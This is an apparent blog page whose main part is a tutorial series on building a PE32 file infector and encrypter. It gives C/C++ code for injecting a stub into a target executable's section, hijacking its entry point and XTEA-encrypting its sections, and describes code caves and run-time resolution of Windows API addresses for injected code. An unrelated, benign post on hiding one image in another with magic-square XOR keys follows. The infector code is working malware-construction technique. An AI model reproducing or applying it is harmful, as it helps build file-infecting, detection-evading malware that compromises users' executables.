//   section    - header of the section that receives the code
//   image_addr - start of the memory-mapped target file
//   stub_addr  - first byte of the stub; its length is determined by get_stub_size
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    const unsigned int byte_count = get_stub_size(stub_addr);
    // PointerToRawData is a file offset, so it is applied to the start of the mapping
    unsigned char *const destination = static_cast<unsigned char *>(image_addr) + section->PointerToRawData;
    memcpy(destination, stub_addr, byte_count);
}

Changing the file entry point is slightly more complicated, but not by much. It is simply a matter of finding where the new data is and performing a bit of math to get the correct offset to set as the new entry point.

// Points the image's entry point at the first byte of the given section's raw data.
//   nt_headers - NT headers of the mapped file; AddressOfEntryPoint is rewritten
//   section    - section whose PointerToRawData marks the new entry point
// The file offset is translated to an RVA through whichever section's raw data range
// contains it. If no section contains the offset, a message is printed and the entry
// point is left unchanged (previously a meaningless value was written in that case).
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    const unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i, ++current_section) {
        const unsigned int raw_start = current_section->PointerToRawData;
        const unsigned int raw_end = raw_start + current_section->SizeOfRawData;
        if(file_address >= raw_start && file_address < raw_end) {
            // RVA = offset within the section's raw data + the section's RVA.
            // AddressOfEntryPoint is relative to the image base, so ImageBase is not involved.
            nt_headers->OptionalHeader.AddressOfEntryPoint =
                (file_address - raw_start) + current_section->VirtualAddress;
            return;
        }
    }
    wprintf(L"Could not find a section containing file offset 0x%X", file_address);
}

And finally, the last thing to do is to encrypt the entire file, with the exception of the written stub (which includes the decryption routine), and the .rdata and .rsrc sections since they both only contain initialized data and resources respectively. The encryption routine that was used is the eXtended TEA (XTEA) block cipher. Every 8 bytes of program data is run through 32 rounds of the cipher and written to the file. The implementation is shown below:

// Encrypts the raw data of every section of the mapped file in place, except the sections
// named ".rdata", ".rsrc" and excluded_section_name.
//   nt_headers            - NT headers of the mapped file
//   target_file           - mapping information; file_mem_buffer is the start of the file
//   excluded_section_name - name of an additional section to leave untouched (the injected stub)
// Data is processed in 8-byte blocks: each block is read as two big-endian 32-bit words,
// run through 32 rounds of XTEA and written back in the same byte order.
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    const size_t excluded_count = sizeof(excluded_sections)/sizeof(excluded_sections[0]);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i, ++current_section) {
        // Name is a fixed 8-byte field that need not be NUL-terminated, so the comparison
        // is bounded. Testing the result against 0 also avoids depending on the particular
        // non-zero value strcmp/strncmp returns for a mismatch.
        bool excluded = false;
        for(size_t j = 0; j < excluded_count && !excluded; ++j) {
            excluded = excluded_sections[j] != NULL &&
                strncmp(excluded_sections[j], (const char *)current_section->Name, IMAGE_SIZEOF_SHORT_NAME) == 0;
        }
        if(excluded) {
            continue;
        }
        unsigned char *section_start = 
            (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
        unsigned char *section_end = section_start + current_section->SizeOfRawData;
        const unsigned int num_rounds = 32;
        const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
        for(unsigned char *k = section_start; k < section_end; k += 8) {
            unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
            unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
            unsigned int full_block[] = {block1, block2};
            encrypt(num_rounds, full_block, key);
            // Swap each word so that the memcpy below stores it most significant byte first
            full_block[0] = swap_endianess(full_block[0]);
            full_block[1] = swap_endianess(full_block[1]);
            memcpy(k, full_block, sizeof(full_block));
        }
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
// XTEA block encryption: transforms the 64-bit block held in blocks[0..1]
// in place using the 128-bit key in key[0..3].
//
//   num_rounds - number of cipher rounds to apply (0 leaves the block as is).
//   blocks     - the two 32-bit halves of the block; overwritten with the result.
//   key        - the four 32-bit key words; only read.
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int &left = blocks[0];
    unsigned int &right = blocks[1];
    unsigned int sum = 0;

    for (unsigned int remaining = num_rounds; remaining != 0; --remaining) {
        // First half-round: mix the right half into the left, key word chosen
        // by the low two bits of the running sum.
        const unsigned int right_mix = ((right << 4) ^ (right >> 5)) + right;
        left += right_mix ^ (sum + key[sum & 3]);

        sum += delta;

        // Second half-round: mix the updated left half into the right, key
        // word chosen by bits 11-12 of the running sum.
        const unsigned int left_mix = ((left << 4) ^ (left >> 5)) + left;
        right += left_mix ^ (sum + key[(sum >> 11) & 3]);
    }
}

With all that done, the file can be unmapped from memory and the changes saved with FlushViewOfFile.

A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Background (1/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:53 PM

This next series of posts will focus on explaining a file infector/encrypter that I wrote a week ago or so. It works with any PE32 executable file, overcomes issues with randomized base addresses, and takes advantage of Visual Studio’s C++ compiler to generate the assembly code to inject into the target. This allows for large portions of the injected code to be written in C and greatly speeds up development time. Lastly, the target file is also encrypted by the infector and the decryption routine is written in to decrypt the file image at runtime. The series will be broken up into the four parts listed below:

  1. Background
  2. PE file modification/section injection
  3. Writing the compiled stub
  4. Full source code and remarks

Since this post will focus on the background of the project, there will be no (relevant) code contained in it. This post will discuss the high level concepts involved behind the infector, issues that arise while developing something like this, and provide an overview of the architecture of the infector. The usual warnings come with this article such as using it only to enhance your knowledge and to not be a script kiddie and rip the code to spread malware.

A file infector is simply an application that adds code to another process in hopes of executing that code. This code can itself be an infector which continues to spread to other files, or it can just be an arbitrary block of code with some defining purpose. Simply introducing code to a file is not enough though, as the normal control flow of the target process would never invoke it. Therefore, there are two main options: parts of the target file can be overwritten with a jump to the code, usually called a code cave. This includes variations such as writing itself into a subroutine and jumping to a block containing parts of the original code. The other option is to hijack the entry point of the target file and modify it so the process starts up and immediately executes the desired code. The two techniques are illustrated below:

The original control flow of an application

The hijacked version, with a jump to what was an empty part of the process, but now would contain instructions to execute

The added instructions to be executed. The overwritten code is restored at the end and a jump returns control flow back to normal.

The other mentioned technique, modifying the entry point:

The entry point is an offset from the image base and denotes where the program begins execution. It is possible to take control of the application by modifying the entry point to point to the added code block, then jumping from the added code block to the original entry point. One thing to note though is that the ImageBase value is not always reliable, since applications linked with /DYNAMICBASE in Visual Studio (or whatever appropriate linker flag with different compilers) will have a “randomized” base address. This means that the jump back into the original entry point cannot have a hardcoded address (0x00400000 + 0x000153B7 in this case), but instead needs to be found by the injected code at runtime.

The next issue arises when the injected code wants to call any Windows API functions. Load addresses of kernel32.dll, ntdll.dll, and user32.dll are not guaranteed to always be the same, and DLLs such as Ws2_32.dll, Shlwapi.dll, and so on are not even guaranteed to be loaded. This means that call addresses to the Windows API cannot be hardcoded, and it also means that additional DLLs may have to be loaded in order to use their functionality. The good news is that since kernel32.dll is loaded into every process, its load address can be obtained from the process environment block (PEB). Then the export address table (EAT) of kernel32.dll can be walked and the address of LoadLibrary can be obtained to load additional DLLs. All exported functions in the DLL can be found through the function name table and through the usage of the function and ordinal table to obtain the address (more on this in part 3).

The last issue is that functions in the C runtime cannot be used. Again, this issue arises because of randomized base addresses — the address of the desired function simply cannot be hardcoded into the piece of code to be injected. This means that the functions will have to be implemented in assembly. This really isn’t too bad — for my version I only implemented strlen and a variation on strcmp, both needed when traversing the function name table.

The architecture of the infector has two main components: the injection function which will be injected into the target, and the code to map the file, add the code, modify the entry point, and so on. The injection function will be entirely self contained, and written in C and assembly. The C compiler will be leveraged to generate the assembly instructions that will be injected into the target. At runtime, the infector will calculate the length of the injection function, modify part of the function to insert the correct entry point offset, write the instructions into the target file, and lastly modify the entry point of the target file to execute the function upon loading. Lastly, the file will be encrypted. The role of the injection function is to decrypt the contents at runtime and continue normal execution.

A downloadable PDF of this post can be found here

January 23, 2011

Steganography with Magic Squares

Filed under: Cryptography — admin @ 11:36 AM

Steganography is “the art or practice of concealing a message, image, or file within another message, image, or file.” The general premise is that your message is in plain sight, but obscured by the fact that no one, except who you want, knows to look for it. An image file or a block of text looks more unsuspecting than something like 03b062766c06092b6926f84ef0c41ad434fdfb327b6ee80c8fff87cefa09590f2212bb82b6b5

aa027a17529deadb99b206e580a3625f8784726d308bb9d7afa3e8cd97d83fb8f6ed1111c2ce

c4b64a60a5deca3bbaeba1b3241bb13718779ddaf01cd511f74c5ca59d1a51f11171cb9221cea9

ed6aad68fa73d22568899d328e

which is a 1024-bit RSA ciphertext. Steganography can be performed in countless ways — from modifying bits in files to using invisible ink to write a message on a physical canvas. Steganography also has quite a history, going back to the times of ancient Greece. Herodotus wrote about Histiaeus shaving the head of his most trusted slave and tattooing a message on the slave’s bald head. When the slave’s hair regrew, the message would be concealed and the slave could be sent off without having to conceal any physical evidence of a message. The receiving end  of the message (Aristagoras) would either know of the messages existence, or the slave would be trusted to reveal it to him upon arrival. With the advent of the digital age, Steganography can take advantage of technology and become more widespread. Images, text documents, music files, or any seemingly common and innocent looking object can be taken advantage of to conceal a message. This can then be transmitted over the internet to knowing parties without anyone knowing — unless they are specifically looking for it. The sheer size of the internet makes steganographic messages very difficult (almost impossible?) to spot. Knowing that there are messages buried within the billions of images, or files in general, on the internet doesn’t really provide any sort of start on how to get those images. Also, once a steganographic message is found, it is very difficult to extract. If the message was not encoded naively, there is not much of a starting point. The message can be encoded in a way to still pass a chi-square test for randomness of bits so extracting a key or plaintext message would be difficult. The steganographic message itself can be ciphertext which yields even further complications. As a result, an analogue to cryptanalysis called steganalysis has been (and is being) developed to find and extract steganographic codes. 
Most of the techniques rely on statistical analysis to find unusual features in a message — which may go on to yield how it was encoded and allow for the original message to be deciphered.

I recently decided to make a program that would hide one image in another. This works by doing a simple least significant bit substitution. The four least significant bits (LSBs) of every RGB value in the source image would be substituted with the four most significant bits (MSBs) of the hidden image. This takes advantage of the fact that the four LSB values do not encode a large range of colors — their range is 0 to 15, as opposed to 16 to 255 of the remaining four bits. The theory is then that you can take two pixels, line them up, and make a new pixel. This new pixel has the four MSBs of the original image, but has its four LSBs replaced by the four MSBs of the hidden image. This preserves most of the color range of the source image, and encodes the important part of the hidden image. Thus,

+  = 

Visually, the difference is very small, even at the pixel level. On a large scale, with the colors blending together, a normal image and one that contains a message is very difficult to spot. The program that I originally wrote to do the simple LSB substitution technique produced these two images.

Which one has the hidden message embedded inside?

The difference in color is extremely difficult to spot on this scope. No image artifacts are present unless someone is specifically looking for them. At first glance, no one would know that a message is hidden in one of those two images. Performing the bit extraction on the following two images produces these two resulting images:

Quite a surprising difference. The results go back to the wide range that the four MSBs can encode.

A problem is that extraction is quite simple. An obfuscation technique that I decided to incorporate into this was the use of magic squares. A magic square is an n x n matrix containing integers whose sum across the rows, columns, and diagonals all equal the same value. For example, the following magic square sums up to 65:

These squares are useful in that for odd numbered sizes there is a general formula to generate a number m at row i and column j. This provides for a linear time algorithm as a function of size and squares of any odd order can be quickly generated. Unfortunately, no formula exists for generating an even numbered square, so I avoided using them for this project. Sidenote: there are techniques to generate even squares in special forms. One of the interesting things about magic squares is the number of unique squares. Excluding rotations and reflections of a square, the number of unique square configurations is: 1, 0, 1, 880, 275305224, for n = 1 .. 5. For n >= 6 there is no known number of configurations. This provides an ample key space to choose from.

There are several ways that magic squares can be useful in steganography. Using a formula to generate a base magic square provides a unique encryption key. Alternatively, a magic square unique from the base square can be found and used as a key. This key can then be used to add a layer of encryption to the hidden data. For example, let the tile below be a 3×3 subsquare of a 9×9 square. A magic square key can then be applied by continually tiling squares over box pixel regions.

So the 9×9 square would be broken up into nine 3×3 squares and the exclusive-or operation applied to the MSB of the hidden image. The same square can then be used when extracting the hidden image. Alternatively, the square can be treated as a one dimensional array and each element will act as an exclusive-or value for each pixel in the hidden image. Taking it even further, the square can be continually rotated or reflected about axes so the key doesn’t show as much repetition, although these steps would also have to be encoded in the image unless the same type of rotation/reflection takes place at each step. There are no shortage of possibilities for unique usage of magic squares. One question may be that since only four bits per color are stored, why use any sized square with values > 15 (0b1111). The answer is that these squares can be extended to be used with any form of data — not just images. Larger sized squares might be useful when more data can be stored — perhaps at some block level instead of a byte level.

For simplicity, I chose to implement a simple algorithm that treats a square as a one dimensional array and uses the four lowest bits of it as an XOR key against the MSBs of the hidden image. The result of extracting the four MSBs without knowing the key of the hidden image is shown below:

The result is significantly different without knowing the key. Extracting the four LSBs is not enough to give much information about the source image. The size of the square also affects how the resulting image will be viewed (which should be obvious). A longer key provides for more distortion across the image. A key of length equal to or greater than the data to encrypt would provide the best results. Below are the results with magic squares of n = 7, 13, 17, and 51.

Overall, the technique is really simple to implement and there shouldn’t be anything stopping anyone from using a simple XOR-based encryption for extra security, at the very least.

A copy of this post is available as a downloadable PDF here.

Powered by WordPress